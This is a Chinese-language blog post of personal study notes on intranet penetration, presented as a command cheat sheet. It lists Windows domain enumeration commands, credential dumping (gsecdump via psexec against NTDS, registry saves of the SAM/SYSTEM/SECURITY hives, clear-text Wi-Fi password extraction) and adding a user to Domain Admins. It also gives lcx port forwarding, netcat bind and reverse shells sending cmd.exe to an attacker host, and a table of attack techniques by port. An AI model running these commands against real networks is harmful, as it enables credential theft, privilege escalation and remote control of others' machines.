<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <script type="text/javascript" src="//libs.baidu.com/jquery/1.8.3/jquery.min.js"></script>
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="学习笔记,">





  <link rel="alternate" href="/atom.xml" title="Fengx 的博客" type="application/atom+xml">






<meta name="description" content="内网渗透基础知识前言 了解一下内网的ip分配。。。。。。   内网常用的三种ip：A类 10.0.0.0–10.255.255.255B类 172.16.0.0–172.31.255.255C类 192.168.0.0–192.168.255.255  什么是域控制器  域控制器是指在“域”模式下，至少有一台服务器负责每一台联入网络的电脑和用户的验证工作，相当于一个单位的门卫一样，称为域控制器（D">
<meta name="keywords" content="学习笔记">
<meta property="og:type" content="article">
<meta property="og:title" content="内网渗透基础知识">
<meta property="og:url" content="https://feng4.github.io/2019/08/26/内网渗透基础知识/index.html">
<meta property="og:site_name" content="Fengx 的博客">
<meta property="og:description" content="内网渗透基础知识前言 了解一下内网的ip分配。。。。。。   内网常用的三种ip：A类 10.0.0.0–10.255.255.255B类 172.16.0.0–172.31.255.255C类 192.168.0.0–192.168.255.255  什么是域控制器  域控制器是指在“域”模式下，至少有一台服务器负责每一台联入网络的电脑和用户的验证工作，相当于一个单位的门卫一样，称为域控制器（D">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://feng4.github.io/2019/08/26/内网渗透基础知识/poxy.png">
<meta property="og:image" content="https://feng4.github.io/2019/08/26/内网渗透基础知识/poxy2.png">
<meta property="og:updated_time" content="2019-08-26T06:23:33.993Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="内网渗透基础知识">
<meta name="twitter:description" content="内网渗透基础知识前言 了解一下内网的ip分配。。。。。。   内网常用的三种ip：A类 10.0.0.0–10.255.255.255B类 172.16.0.0–172.31.255.255C类 192.168.0.0–192.168.255.255  什么是域控制器  域控制器是指在“域”模式下，至少有一台服务器负责每一台联入网络的电脑和用户的验证工作，相当于一个单位的门卫一样，称为域控制器（D">
<meta name="twitter:image" content="https://feng4.github.io/2019/08/26/内网渗透基础知识/poxy.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'fengx'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://feng4.github.io/2019/08/26/内网渗透基础知识/">





  <title>内网渗透基础知识 | Fengx 的博客</title>
  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?7d9454cbb6cb14a7b1c1bbfcd106d25f";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Fengx 的博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Fengx's blog</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://feng4.github.io/2019/08/26/内网渗透基础知识/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Fengx">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/fengx.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Fengx 的博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">内网渗透基础知识</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-08-26T13:04:42+08:00">
                2019-08-26
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv">本文阅读量<i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>次
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="内网渗透基础知识"><a href="#内网渗透基础知识" class="headerlink" title="内网渗透基础知识"></a>内网渗透基础知识</h3><h4 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h4><blockquote>
<p>了解一下内网的ip分配。。。。。。<br></p>
</blockquote>
<blockquote>
<p>内网常用的三种ip：<br><br>A类 10.0.0.0–10.255.255.255<br><br>B类 172.16.0.0–172.31.255.255<br><br>C类 192.168.0.0–192.168.255.255<br></p>
</blockquote>
<p><strong>什么是域控制器</strong><br></p>
<blockquote>
<p>域控制器是指在“域”模式下，至少有一台服务器负责每一台联入网络的电脑和用户的验证工作，相当于一个单位的门卫一样，称为域控制器（Domain Controller，简写为DC） <br></p>
</blockquote>
<blockquote>
<p>在域中拥有最高权限，它能对域中的所有计算机进行操作和管理。</p>
</blockquote>
<h4 id="一、内网中常用的系统命令"><a href="#一、内网中常用的系统命令" class="headerlink" title="一、内网中常用的系统命令"></a>一、内网中常用的系统命令</h4><p><strong>1.内网网络探测常用命令</strong><br></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">tracert IP    //路由跟踪 </span><br><span class="line">route print    //打印路由表 </span><br><span class="line">arp -a          //列出本网段内所有活跃的IP地址 </span><br><span class="line">arp -s (ip + mac) //绑定mac与ip地址 </span><br><span class="line">arp -d (ip + mac) //解绑mac与ip地址 </span><br><span class="line">nbtscan -r 192.168.16.0/24  //通过小工具nbtscan扫描整个网络 </span><br><span class="line">netsh firewall show config    //查看防火墙策略 </span><br><span class="line">netsh firewall show state     //查看防火墙策略</span><br><span class="line">for /l %i in (1,1,255) do @ping 192.168.10.%i -w 1 -n 1 | find /i &quot;ttl&quot; //探测存活主机</span><br></pre></td></tr></table></figure>
<p><strong>2.windows操作命令</strong><br></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">net group /domain                          //获得所有域用户组列表</span><br><span class="line">net group xxx /domain              //显示域中xxx组</span><br><span class="line">net group xxx /del /domain         //删除域中xxx组</span><br><span class="line">net group xxx nx /del /domain      //删除域内xxx组中的成员nx</span><br><span class="line">net group xxx /add /domain         //添加域中的群组xxx</span><br><span class="line">net group &quot;domain admins&quot; /domain  //获得域管理员列表</span><br><span class="line">net group &quot;enterprise admins&quot; /domain //获得企业管理员列表</span><br><span class="line">net localgroup administrators /domain //获得域内置administrators组用户</span><br><span class="line">net group &quot;domain controllers&quot; /domain //获得域控制器列表</span><br><span class="line">net group &quot;domain computers&quot; /domain //获得所有域成员计算机列表</span><br><span class="line">net user /domain   //获得所有域用户列表</span><br><span class="line">net user xxx /domain //获得账户xxx的详细信息</span><br><span class="line">net accounts /domain //获得域密码策略设置，密码长短，错误锁定等信息</span><br><span class="line">net view /domain     //查询有几个域，查询域列表</span><br><span class="line">net view /domain:xxx //查看xxx域中的计算机列表</span><br><span class="line">nltest /domain_trusts  //获取域信任信息</span><br><span class="line">net user domain-admin /domain //查看域管理员登录时间，密码过期时间，是否有登录脚本，组分配等信息</span><br><span class="line">net config workstation  //查询机器属于哪个域</span><br><span class="line">net time /domain     //查询主域服务器的时间</span><br><span class="line">echo %logonserver%   //查看登入到这台服务器的计算机名</span><br><span class="line">net time \\192.168.1.1  //查询远程共享主机192.168.1.1的时间</span><br><span class="line">net use \\ip\ipc$ password /user:username@domain //ipc$域内连接</span><br><span class="line">net view \\xxx.ggg.com  //查看域控共享情况</span><br><span class="line">dir \\dc2.backlion.com\SYSVOL /s /a &gt; sysvol.txt  //列出sysvol日志记录 </span><br><span class="line">xcopy \\dc2.backlion.com\sysvol.txt sysvol.txt  /i  /e  /c//远程拷贝到本地sysvol日志 </span><br><span class="line">net user  /domain  bk bk123                 //修改域内用户密码，需要管理员权限 </span><br><span class="line">net  localgroup  administartors   SEZKL\backlion  /add     //将SEZKL域中的用户backlion添加到administrators组中 </span><br><span class="line">mstsc /admin                 //远程桌面登录到console会话解决hash无法抓出问题 </span><br><span class="line">gpupdate/force                  //更新域策略 </span><br><span class="line">psexec  \\192.168.1.3 -u administrator -p bk1234 -c gsecdump.exe -u //从域服务器密码存储文件windows/ntds/ntds.dit导出hash值出来 </span><br><span class="line">gsecdump  -a      //获取域登管理员登录过得hash值，这里gescdump为第三方导出AD域的hash值 </span><br><span class="line">tasklist /S ip /U domain\username /P /V    //查看远程计算机进程列</span><br></pre></td></tr></table></figure>
<p>普通域用户提升为域管理员:<br><code>net group &quot;Domain Admins&quot; xxx /add /domain</code><br></p>
<p><strong>3.基本内网渗透命令</strong><br></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">ipconfig /all  //查看ip地址</span><br><span class="line">ipconfig /release //释放地址</span><br><span class="line">ipconfig /renew  //重新获取ip地址</span><br><span class="line">whoami  //查询账号用户名</span><br><span class="line">whoami /all  //查看sid值</span><br><span class="line">systeminfo  //查询系统以及补丁信息</span><br><span class="line">tasklist /svc  //查看进程</span><br><span class="line">taskkill /im 进程名称(cmd)  //结束进程</span><br><span class="line">taskkill /pid[进程码] -t(结束该进程) -f(强制结束该进程以及所有子进程)</span><br><span class="line">wmic qfe get hotfixid  //查看已安装的补丁</span><br><span class="line">wmic qfe list full /format:htable &gt; hotfixes.htm //详细的补丁安装</span><br><span class="line">wmic qfe     //查询补丁信息以及微软提供的下载地址</span><br><span class="line">net start    //查看当前运行的服务</span><br><span class="line">net user     //查看本地组的用户</span><br><span class="line">net localgroup administrators  //查看本机管理员组有哪些用户</span><br><span class="line">net use   //查看会话</span><br><span class="line">net session  //查看当前会话</span><br><span class="line">net share    //查看SMB指向的路径[即共享]</span><br><span class="line">wmic share get name,path   //查看SMB指向的路径</span><br><span class="line">wmic nteventlog get path,filename,writeable //查询系统日志文件存储位置 </span><br><span class="line">net use \\IP\ipc$  password  /user:username      //建立IPC会话（工作组模式） </span><br><span class="line">net use  z:  \\192.168.1.1      //建立映射到本机Z盘 </span><br><span class="line">net time \\172.16.16.2        //查询共享主机的是 </span><br><span class="line">at \\172.16.16.2 13:50 c:\windows\2009.exe      //在共享主机上执行 </span><br><span class="line">netstat  -ano      //查看开放的端口 </span><br><span class="line">netstat -an | find “3389”   //找到3389端口 </span><br><span class="line">net accounts      //查看本地密码策略 </span><br><span class="line">nbtstat –A ip      //netbiso查询 </span><br><span class="line">net view      //查看机器注释或许能得到当前活动状态的机器列表，如果禁用netbios就查看不出来 </span><br><span class="line">echo %PROCESSOR_ARCHITECTURE%        //查看系统是32还是64位   </span><br><span class="line">set                              //查看系统环境设置变量 </span><br><span class="line">net start                     //查看当前运行的服务 </span><br><span class="line">wmic service list brief             //查看进程服务 </span><br><span class="line">wmic process list brief         //查看进程 </span><br><span class="line">wmic startup list brief       //查看启动程序信息 </span><br><span class="line">wmic product list brief           //查看安装程序和版本信息（漏洞利用线索） </span><br><span class="line">wmic startup list full         //识别开机启动的程序 </span><br><span class="line">wmic process where(description=&quot;mysqld.exe&quot;) &gt;&gt;mysql.log  //获取软件安装路径 </span><br><span class="line">for /f &quot;skip=9 tokens=1,2 delims=:&quot; %i in (&apos;netsh wlan showprofiles&apos;) do @echo %j | findstr -i -v echo | netsh wlan show profiles %jkey=clear  //一键获取wifi密码 </span><br><span class="line">if defined PSModulePath (echo 支持powershell) else (echo 不支持powershell) //查看是否支持posershell </span><br><span class="line">qwinsta                       //查看登录情况</span><br><span class="line">set KB2829361=MS13-046&amp;set KB2830290=MS13-046&amp;set KB2667440=MS12-020&amp;set KB2667402=MS12-020&amp;set KB3124280=MS16-016&amp;set KB3077657=MS15-077&amp;set KB3045171=MS15-051&amp;set KB2592799=MS11-080&amp;set KB952004=MS09-012 PR&amp;set KB956572=MS09-012 巴西烤肉&amp;set KB970483=MS09-020 iis6&amp;set KB2124261=MS10-065 ii7&amp;set KB2271195=MS10-065 ii7&amp;systeminfo&gt;a.txt&amp;(for %i in (KB952004 KB956572 KB2393802 KB2503665 KB2592799 KB2621440 KB2160329 KB970483 KB2124261 KB977165 KB958644 KB2667402 KB2667440 KB2830290 KB2829361 KB3045171 KB3077657 KB3124280)do @type a.txt|@find /i &quot;%i&quot;||@echo %%i% Not Installed!)&amp;del /f/q /a a.txt //windows未打补丁情况</span><br></pre></td></tr></table></figure>
<p><strong>4.导出注册表的命令</strong><br></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reg save hklm\sam sam.hive &amp; reg save hklm\system system.hive &amp; reg save hklm\security security.hive</span><br></pre></td></tr></table></figure>
<h4 id="二、内网测试中代理与端口转发"><a href="#二、内网测试中代理与端口转发" class="headerlink" title="二、内网测试中代理与端口转发"></a>二、内网测试中代理与端口转发</h4><p><strong>正向代理</strong><br><br><code>Lhost ——&gt; proxy ——&gt; Rhost</code><br><br><img src="/2019/08/26/内网渗透基础知识/poxy.png" alt="正向代理"></p>
<p><strong>反向代理</strong><br><br><code>Lhost &lt;——&gt; proxy &lt;——&gt; firewall &lt;——&gt; Rhost</code><br><br><img src="/2019/08/26/内网渗透基础知识/poxy2.png" alt="反向代理"></p>
<p><strong>windows lcx端口转发</strong><br></p>
<p>lcx常用命令：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">1: -listen &lt;ConnectPort1&gt; &lt;TransmitPort2&gt;</span><br><span class="line">监听p1,接收由p2转发过来的数据 </span><br><span class="line">2: -tarn &lt;ConnectPort&gt; &lt;TransmitHost&gt; &lt;TransmitPort&gt;</span><br><span class="line">端口转向功能，通过访问该端口可以直接与该主机或另一台主机的某一个端口进行通信</span><br><span class="line">3: -slave &lt;TransmitHostB&gt; &lt;PortB&gt; &lt;TransmitHostA&gt; &lt;PortA&gt; </span><br><span class="line">端口转发功能，将目标A机上的端口A,转发到外网B机的端口B上</span><br></pre></td></tr></table></figure></p>
<p>内网上执行：<br><code>lcx.exe –slave 192.168.100.101 8888 192.168.100.111 3389</code></p>
<p><strong>NC反弹CMDshell(netcat)</strong><br></p>
<blockquote>
<p>靶机上输入：<br><code>nc.exe -l -p 8888 -e cmd.exe</code><br>将cmd.exe转发到8888端口</p>
</blockquote>
<blockquote>
<p>攻击机输入：<br><code>nc.exe -nvv 192.168.100.101 8888</code><br>连接到靶机的8888端口(获取cmd.exe的执行权限)</p>
</blockquote>
<p><strong>反向连接：</strong></p>
<blockquote>
<p>攻击机输入：<br><code>nc.exe -l -p 8888</code><br>监听本地8889端口</p>
</blockquote>
<blockquote>
<p>靶机上输入：<br><code>nc.exe -e cmd.exe 192.168.100.100 8888</code><br>将靶机的cmd.exe转发到攻击机的8889端口</p>
</blockquote>
<h4 id="三、端口与服务"><a href="#三、端口与服务" class="headerlink" title="三、端口与服务"></a>三、端口与服务</h4><table>
<thead>
<tr>
<th style="text-align:center">端口号</th>
<th style="text-align:center">端口说明</th>
<th style="text-align:center">攻击技巧</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:center">21/22/69</td>
<td style="text-align:center">ftp/tftp：文件传输协议</td>
<td style="text-align:center">爆破\嗅探\溢出\后门</td>
</tr>
<tr>
<td style="text-align:center">22</td>
<td style="text-align:center">ssh：远程连接</td>
<td style="text-align:center">爆破OpenSSH；28个退格</td>
</tr>
<tr>
<td style="text-align:center">23</td>
<td style="text-align:center">telnet：远程连接</td>
<td style="text-align:center">爆破\嗅探</td>
</tr>
<tr>
<td style="text-align:center">25</td>
<td style="text-align:center">smtp：邮件服务</td>
<td style="text-align:center">邮件伪造</td>
</tr>
<tr>
<td style="text-align:center">53</td>
<td style="text-align:center">DNS：域名系统</td>
<td style="text-align:center">DNS区域传输\DNS劫持\DNS缓存投毒\DNS欺骗\利用DNS隧道技术刺透防火墙</td>
</tr>
<tr>
<td style="text-align:center">67/68</td>
<td style="text-align:center">dhcp</td>
<td style="text-align:center">劫持\欺骗</td>
</tr>
<tr>
<td style="text-align:center">110</td>
<td style="text-align:center">pop3</td>
<td style="text-align:center">爆破</td>
</tr>
<tr>
<td style="text-align:center">139</td>
<td style="text-align:center">samba</td>
<td style="text-align:center">爆破\未授权访问\远程代码执行</td>
</tr>
<tr>
<td style="text-align:center">143</td>
<td style="text-align:center">imap</td>
<td style="text-align:center">爆破</td>
</tr>
<tr>
<td style="text-align:center">161</td>
<td style="text-align:center">snmp</td>
<td style="text-align:center">爆破</td>
</tr>
<tr>
<td style="text-align:center">389</td>
<td style="text-align:center">ldap</td>
<td style="text-align:center">注入攻击\未授权访问</td>
</tr>
<tr>
<td style="text-align:center">512/513/514</td>
<td style="text-align:center">linux r</td>
<td style="text-align:center">直接使用rlogin</td>
</tr>
<tr>
<td style="text-align:center">873</td>
<td style="text-align:center">rsync</td>
<td style="text-align:center">未授权访问</td>
</tr>
<tr>
<td style="text-align:center">1080</td>
<td style="text-align:center">socket</td>
<td style="text-align:center">爆破：进行内网渗透</td>
</tr>
<tr>
<td style="text-align:center">1352</td>
<td style="text-align:center">lotus</td>
<td style="text-align:center">爆破：弱口令\信息泄漏：源代码</td>
</tr>
<tr>
<td style="text-align:center">1433</td>
<td style="text-align:center">mssql</td>
<td style="text-align:center">爆破：使用系统用户登录\注入攻击</td>
</tr>
<tr>
<td style="text-align:center">1521</td>
<td style="text-align:center">oracle</td>
<td style="text-align:center">爆破：TNS\注入攻击</td>
</tr>
<tr>
<td style="text-align:center">2049</td>
<td style="text-align:center">nfs</td>
<td style="text-align:center">配置不当</td>
</tr>
<tr>
<td style="text-align:center">2181</td>
<td style="text-align:center">zookeeper</td>
<td style="text-align:center">未授权访问</td>
</tr>
<tr>
<td style="text-align:center">3306</td>
<td style="text-align:center">mysql</td>
<td style="text-align:center">爆破\拒绝服务\注入</td>
</tr>
<tr>
<td style="text-align:center">3389</td>
<td style="text-align:center">rdp</td>
<td style="text-align:center">爆破\Shift后门\0708</td>
</tr>
<tr>
<td style="text-align:center">4848</td>
<td style="text-align:center">glassfish</td>
<td style="text-align:center">爆破：控制台弱口令\认证绕过</td>
</tr>
<tr>
<td style="text-align:center">5000</td>
<td style="text-align:center">sybase/DB2</td>
<td style="text-align:center">爆破\注入</td>
</tr>
<tr>
<td style="text-align:center">5432</td>
<td style="text-align:center">postgresql</td>
<td style="text-align:center">缓冲区溢出\注入攻击\爆破：弱口令</td>
</tr>
<tr>
<td style="text-align:center">5632</td>
<td style="text-align:center">pcanywhere</td>
<td style="text-align:center">拒绝服务\代码执行</td>
</tr>
<tr>
<td style="text-align:center">5900</td>
<td style="text-align:center">vnc</td>
<td style="text-align:center">爆破：弱口令\认证绕过</td>
</tr>
<tr>
<td style="text-align:center">6379</td>
<td style="text-align:center">redis</td>
<td style="text-align:center">未授权访问\爆破：弱口令</td>
</tr>
<tr>
<td style="text-align:center">7001</td>
<td style="text-align:center">weblogic</td>
<td style="text-align:center">Java反序列化\控制台弱口令\控制台部署webshell</td>
</tr>
<tr>
<td style="text-align:center">80/443/8080</td>
<td style="text-align:center">web</td>
<td style="text-align:center">常见web攻击\控制台爆破\对应服务器版本漏洞</td>
</tr>
<tr>
<td style="text-align:center">8069</td>
<td style="text-align:center">zabbix</td>
<td style="text-align:center">远程命令执行</td>
</tr>
<tr>
<td style="text-align:center">9090</td>
<td style="text-align:center">websphere控制台</td>
<td style="text-align:center">爆破：控制台弱口令\Java反序列</td>
</tr>
<tr>
<td style="text-align:center">9200/9300</td>
<td style="text-align:center">elasticsearch</td>
<td style="text-align:center">远程代码执行</td>
</tr>
<tr>
<td style="text-align:center">11211</td>
<td style="text-align:center">memcacache</td>
<td style="text-align:center">未授权访问</td>
</tr>
<tr>
<td style="text-align:center">27017</td>
<td style="text-align:center">mongodb</td>
<td style="text-align:center">爆破\未授权访问</td>
</tr>
</tbody>
</table>

      
    </div>

    
    
    

    
  
    <div>
      
       <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
</div>
      
    </div>  

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/学习笔记/" rel="tag"><i class="fa fa-tag"></i> 学习笔记</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/08/19/centos安装msf/" rel="next" title="centos安装msf">
                <i class="fa fa-chevron-left"></i> centos安装msf
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/fengx.jpg" alt="Fengx">
            
              <p class="site-author-name" itemprop="name">Fengx</p>
              <p class="site-description motion-element" itemprop="description">IT,web,网络安全</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">29</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">14</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/feng43" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://twitter.com/FengWu198" target="_blank" title="Twitter">
                      
                        <i class="fa fa-fw fa-twitter"></i>Twitter</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#内网渗透基础知识"><span class="nav-number">1.</span> <span class="nav-text">内网渗透基础知识</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#前言"><span class="nav-number">1.1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#一、内网中常用的系统命令"><span class="nav-number">1.2.</span> <span class="nav-text">一、内网中常用的系统命令</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#二、内网测试中代理与端口转发"><span class="nav-number">1.3.</span> <span class="nav-text">二、内网测试中代理与端口转发</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#三、端口与服务"><span class="nav-number">1.4.</span> <span class="nav-text">三、端口与服务</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

